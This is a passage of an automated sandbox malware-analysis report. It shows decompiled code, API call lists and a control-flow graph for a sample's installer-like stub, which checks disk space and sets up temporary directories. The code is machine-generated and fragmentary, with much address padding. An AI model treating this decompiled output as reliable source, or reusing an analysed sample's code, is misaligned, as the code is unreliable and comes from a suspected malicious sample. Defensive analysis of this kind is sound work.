                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd57b0
                                                                                                                                                                                                    0x00fd579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5769
                                                                                                                                                                                                    0x00fd5762
                                                                                                                                                                                                    0x00fd5753
                                                                                                                                                                                                    0x00fd574f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd572e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5864
                                                                                                                                                                                                    0x00fd5864
                                                                                                                                                                                                    0x00fd5864
                                                                                                                                                                                                    0x00fd5717
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56c3
                                                                                                                                                                                                    0x00fd56c5
                                                                                                                                                                                                    0x00fd56c9
                                                                                                                                                                                                    0x00fd56ce
                                                                                                                                                                                                    0x00fd56d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56d6
                                                                                                                                                                                                    0x00fd56d6
                                                                                                                                                                                                    0x00fd56d8
                                                                                                                                                                                                    0x00fd56dd
                                                                                                                                                                                                    0x00fd56df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56e1
                                                                                                                                                                                                    0x00fd56e2
                                                                                                                                                                                                    0x00fd56e4
                                                                                                                                                                                                    0x00fd56e6
                                                                                                                                                                                                    0x00fd56eb
                                                                                                                                                                                                    0x00fd56ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56f3
                                                                                                                                                                                                    0x00fd56f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd586c
                                                                                                                                                                                                    0x00fd5878
                                                                                                                                                                                                    0x00fd587e
                                                                                                                                                                                                    0x00fd5882
                                                                                                                                                                                                    0x00fd5883
                                                                                                                                                                                                    0x00fd5889
                                                                                                                                                                                                    0x00fd588e
                                                                                                                                                                                                    0x00fd588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5896
                                                                                                                                                                                                    0x00fd56ed
                                                                                                                                                                                                    0x00fd56df
                                                                                                                                                                                                    0x00fd56d0
                                                                                                                                                                                                    0x00fd56c1
                                                                                                                                                                                                    0x00fd56a8
                                                                                                                                                                                                    0x00fd565b
                                                                                                                                                                                                    0x00fd565b
                                                                                                                                                                                                    0x00fd565d
                                                                                                                                                                                                    0x00fd5669
                                                                                                                                                                                                    0x00fd5669
                                                                                                                                                                                                    0x00fd565f
                                                                                                                                                                                                    0x00fd565f
                                                                                                                                                                                                    0x00fd5665
                                                                                                                                                                                                    0x00fd5667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5667
                                                                                                                                                                                                    0x00fd566c
                                                                                                                                                                                                    0x00fd5673
                                                                                                                                                                                                    0x00fd5678
                                                                                                                                                                                                    0x00fd567a
                                                                                                                                                                                                    0x00fd589b
                                                                                                                                                                                                    0x00fd589b
                                                                                                                                                                                                    0x00fd5680
                                                                                                                                                                                                    0x00fd5685
                                                                                                                                                                                                    0x00fd568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd568c
                                                                                                                                                                                                    0x00fd567a
                                                                                                                                                                                                    0x00fd560e
                                                                                                                                                                                                    0x00fd5613
                                                                                                                                                                                                    0x00fd561a
                                                                                                                                                                                                    0x00fd5620
                                                                                                                                                                                                    0x00fd5626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5626
                                                                                                                                                                                                    0x00fd55db
                                                                                                                                                                                                    0x00fd55e0
                                                                                                                                                                                                    0x00fd55e7
                                                                                                                                                                                                    0x00fd55f1
                                                                                                                                                                                                    0x00fd55f6
                                                                                                                                                                                                    0x00fd55f6
                                                                                                                                                                                                    0x00fd55f6
                                                                                                                                                                                                    0x00fd58b7
                                                                                                                                                                                                    0x00fd58c7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00FD55CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00FD5638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00FD564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FD5620
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD56B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00FD571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00FD5737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00FD57CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00FD57EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00FD5802
                                                                                                                                                                                                      • Part of subcall function 00FD2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00FD2654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00FD5830
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FindResourceA.KERNEL32(00FD0000,000007D6,00000005), ref: 00FD652A
                                                                                                                                                                                                      • Part of subcall function 00FD6517: LoadResource.KERNEL32(00FD0000,00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FD6538
                                                                                                                                                                                                      • Part of subcall function 00FD6517: DialogBoxIndirectParamA.USER32(00FD0000,00000000,00000547,00FD19E0,00000000), ref: 00FD6557
                                                                                                                                                                                                      • Part of subcall function 00FD6517: FreeResource.KERNEL32(00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FD6560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00FD5878
                                                                                                                                                                                                      • Part of subcall function 00FD597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FD59A8
                                                                                                                                                                                                      • Part of subcall function 00FD597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00FD59AF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                    • API String ID: 2436801531-752058184
                                                                                                                                                                                                    • Opcode ID: 70cbf23fc29233a732218d73bf22e64330ca25c94029ae9227502e9052ef5fab
                                                                                                                                                                                                    • Instruction ID: 47fac65aec787030bca9f76e313ec1beb50bb57501fbf8d44168b634eca6ff28
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70cbf23fc29233a732218d73bf22e64330ca25c94029ae9227502e9052ef5fab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C814A71E04A189BDB20AB709C85BEA736F9B61B50F1C00A7F586D2391EF74CDC1BA51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 324 fd597d-fd59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 fd59dd-fd5a1b GetDiskFreeSpaceA 324->325 326 fd59bb-fd59d8 call fd44b9 call fd6285 324->326 328 fd5ba1-fd5bde memset call fd6285 GetLastError FormatMessageA 325->328 329 fd5a21-fd5a4a MulDiv 325->329 345 fd5c05-fd5c14 call fd6ce0 326->345 337 fd5be3-fd5bfc call fd44b9 SetCurrentDirectoryA 328->337 329->328 331 fd5a50-fd5a6c GetVolumeInformationA 329->331 334 fd5a6e-fd5ab0 memset call fd6285 GetLastError FormatMessageA 331->334 335 fd5ab5-fd5aca SetCurrentDirectoryA 331->335 334->337 339 fd5acc-fd5ad1 335->339 351 fd5c02 337->351 343 fd5ad3-fd5ad8 339->343 344 fd5ae2-fd5ae4 339->344 343->344 347 fd5ada-fd5ae0 343->347 349 fd5ae7-fd5af8 344->349 350 fd5ae6 344->350 347->339 347->344 353 fd5af9-fd5afb 349->353 350->349 354 fd5c04 351->354 355 fd5afd-fd5b03 353->355 356 fd5b05-fd5b08 353->356 354->345 355->353 355->356 357 fd5b0a-fd5b1b call fd44b9 356->357 358 fd5b20-fd5b27 356->358 357->351 359 fd5b29-fd5b33 358->359 360 fd5b52-fd5b5b 358->360 359->360 363 fd5b35-fd5b50 359->363 364 fd5b62-fd5b6d 360->364 363->364 365 fd5b6f-fd5b74 364->365 366 fd5b76-fd5b7d 364->366 367 fd5b85 365->367 368 fd5b7f-fd5b81 366->368 369 fd5b83 366->369 370 fd5b87-fd5b94 call fd268b 367->370 371 fd5b96-fd5b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E00FD597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                    				_t46 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                    				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                    				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                    					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                    						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    						 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    						_t110 = 0x4b0;
                                                                                                                                                                                                    						L30:
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						E00FD44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                    						_t66 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                    						_pop(_t114);
                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t69 = _v792 * _v796;
                                                                                                                                                                                                    					_v812 = _t69;
                                                                                                                                                                                                    					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                    					__eflags = _t116;
                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                    					__eflags = _t73;
                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                    						_t101 =  &_v16;
                                                                                                                                                                                                    						_t111 = 6;
                                                                                                                                                                                                    						_t119 = _t118 - _t101;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                    							__eflags = _t22;
                                                                                                                                                                                                    							if(_t22 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                                                    							if(_t87 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *_t101 = _t87;
                                                                                                                                                                                                    							_t101 = _t101 + 1;
                                                                                                                                                                                                    							_t111 = _t111 - 1;
                                                                                                                                                                                                    							__eflags = _t111;
                                                                                                                                                                                                    							if(_t111 != 0) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t111;
                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                    							_t101 = _t101 - 1;
                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t101 = 0;
                                                                                                                                                                                                    						_t112 = 0x200;
                                                                                                                                                                                                    						_t102 = _v812;
                                                                                                                                                                                                    						_t78 = 0;
                                                                                                                                                                                                    						_t118 = 8;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							__eflags = _t102 - _t112;
                                                                                                                                                                                                    							if(_t102 == _t112) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t112 = _t112 + _t112;
                                                                                                                                                                                                    							_t78 = _t78 + 1;
                                                                                                                                                                                                    							__eflags = _t78 - _t118;
                                                                                                                                                                                                    							if(_t78 < _t118) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                    							__eflags =  *0xfd9a34 & 0x00000008;
                                                                                                                                                                                                    							if(( *0xfd9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                    								_t103 =  *0xfd9a38; // 0x0
                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0xfd89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									 *0xfd9124 = 0;
                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t66 = E00FD268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t105 =  *0xfd9a38; // 0x0
                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0xfd89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xfd89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0xfd9a38;
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                    						E00FD44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                    					E00FD44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                    					return E00FD6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x00fd597d
                                                                                                                                                                                                    0x00fd5988
                                                                                                                                                                                                    0x00fd598f
                                                                                                                                                                                                    0x00fd599a
                                                                                                                                                                                                    0x00fd59a6
                                                                                                                                                                                                    0x00fd59a8
                                                                                                                                                                                                    0x00fd59af
                                                                                                                                                                                                    0x00fd59b9
                                                                                                                                                                                                    0x00fd59dd
                                                                                                                                                                                                    0x00fd59e4
                                                                                                                                                                                                    0x00fd59f1
                                                                                                                                                                                                    0x00fd59fe
                                                                                                                                                                                                    0x00fd5a0b
                                                                                                                                                                                                    0x00fd5a13
                                                                                                                                                                                                    0x00fd5a19
                                                                                                                                                                                                    0x00fd5a1b
                                                                                                                                                                                                    0x00fd5ba1
                                                                                                                                                                                                    0x00fd5baf
                                                                                                                                                                                                    0x00fd5bbd
                                                                                                                                                                                                    0x00fd5bd8
                                                                                                                                                                                                    0x00fd5bde
                                                                                                                                                                                                    0x00fd5be3
                                                                                                                                                                                                    0x00fd5bec
                                                                                                                                                                                                    0x00fd5bf0
                                                                                                                                                                                                    0x00fd5bfc
                                                                                                                                                                                                    0x00fd5c02
                                                                                                                                                                                                    0x00fd5c02
                                                                                                                                                                                                    0x00fd5c02
                                                                                                                                                                                                    0x00fd5c04
                                                                                                                                                                                                    0x00fd5c04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5c04
                                                                                                                                                                                                    0x00fd5a27
                                                                                                                                                                                                    0x00fd5a3a
                                                                                                                                                                                                    0x00fd5a46
                                                                                                                                                                                                    0x00fd5a48
                                                                                                                                                                                                    0x00fd5a4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5a64
                                                                                                                                                                                                    0x00fd5a6a
                                                                                                                                                                                                    0x00fd5a6c
                                                                                                                                                                                                    0x00fd5abc
                                                                                                                                                                                                    0x00fd5ac2
                                                                                                                                                                                                    0x00fd5ac9
                                                                                                                                                                                                    0x00fd5aca
                                                                                                                                                                                                    0x00fd5aca
                                                                                                                                                                                                    0x00fd5acc
                                                                                                                                                                                                    0x00fd5acc
                                                                                                                                                                                                    0x00fd5acf
                                                                                                                                                                                                    0x00fd5ad1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5ad3
                                                                                                                                                                                                    0x00fd5ad6
                                                                                                                                                                                                    0x00fd5ad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5ada
                                                                                                                                                                                                    0x00fd5adc
                                                                                                                                                                                                    0x00fd5add
                                                                                                                                                                                                    0x00fd5add
                                                                                                                                                                                                    0x00fd5ae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5ae0
                                                                                                                                                                                                    0x00fd5ae2
                                                                                                                                                                                                    0x00fd5ae4
                                                                                                                                                                                                    0x00fd5ae6
                                                                                                                                                                                                    0x00fd5ae6
                                                                                                                                                                                                    0x00fd5ae6
                                                                                                                                                                                                    0x00fd5ae9
                                                                                                                                                                                                    0x00fd5aeb
                                                                                                                                                                                                    0x00fd5af0
                                                                                                                                                                                                    0x00fd5af6
                                                                                                                                                                                                    0x00fd5af8
                                                                                                                                                                                                    0x00fd5af9
                                                                                                                                                                                                    0x00fd5af9
                                                                                                                                                                                                    0x00fd5afb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5afd
                                                                                                                                                                                                    0x00fd5aff
                                                                                                                                                                                                    0x00fd5b00
                                                                                                                                                                                                    0x00fd5b03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5b03
                                                                                                                                                                                                    0x00fd5b05
                                                                                                                                                                                                    0x00fd5b08
                                                                                                                                                                                                    0x00fd5b20
                                                                                                                                                                                                    0x00fd5b27
                                                                                                                                                                                                    0x00fd5b52
                                                                                                                                                                                                    0x00fd5b52
                                                                                                                                                                                                    0x00fd5b5b
                                                                                                                                                                                                    0x00fd5b62
                                                                                                                                                                                                    0x00fd5b6b
                                                                                                                                                                                                    0x00fd5b6d
                                                                                                                                                                                                    0x00fd5b76
                                                                                                                                                                                                    0x00fd5b7d
                                                                                                                                                                                                    0x00fd5b83
                                                                                                                                                                                                    0x00fd5b7f
                                                                                                                                                                                                    0x00fd5b7f
                                                                                                                                                                                                    0x00fd5b7f
                                                                                                                                                                                                    0x00fd5b6f
                                                                                                                                                                                                    0x00fd5b72
                                                                                                                                                                                                    0x00fd5b72
                                                                                                                                                                                                    0x00fd5b85
                                                                                                                                                                                                    0x00fd5b98
                                                                                                                                                                                                    0x00fd5b9e
                                                                                                                                                                                                    0x00fd5b87
                                                                                                                                                                                                    0x00fd5b8f
                                                                                                                                                                                                    0x00fd5b8f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5b85
                                                                                                                                                                                                    0x00fd5b29
                                                                                                                                                                                                    0x00fd5b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5b35
                                                                                                                                                                                                    0x00fd5b48
                                                                                                                                                                                                    0x00fd5b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5b4a
                                                                                                                                                                                                    0x00fd5b0f
                                                                                                                                                                                                    0x00fd5b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5b16
                                                                                                                                                                                                    0x00fd5a7c
                                                                                                                                                                                                    0x00fd5a8a
                                                                                                                                                                                                    0x00fd5aa5
                                                                                                                                                                                                    0x00fd5aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd59bb
                                                                                                                                                                                                    0x00fd59c0
                                                                                                                                                                                                    0x00fd59c7
                                                                                                                                                                                                    0x00fd59d1
                                                                                                                                                                                                    0x00fd59d6
                                                                                                                                                                                                    0x00fd5c05
                                                                                                                                                                                                    0x00fd5c14
                                                                                                                                                                                                    0x00fd5c14

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FD59A8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00FD59AF
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00FD5A13
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00FD5A40
                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FD5A64
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD5A7C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FD5A98
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FD5AA5
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00FD5BFC
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
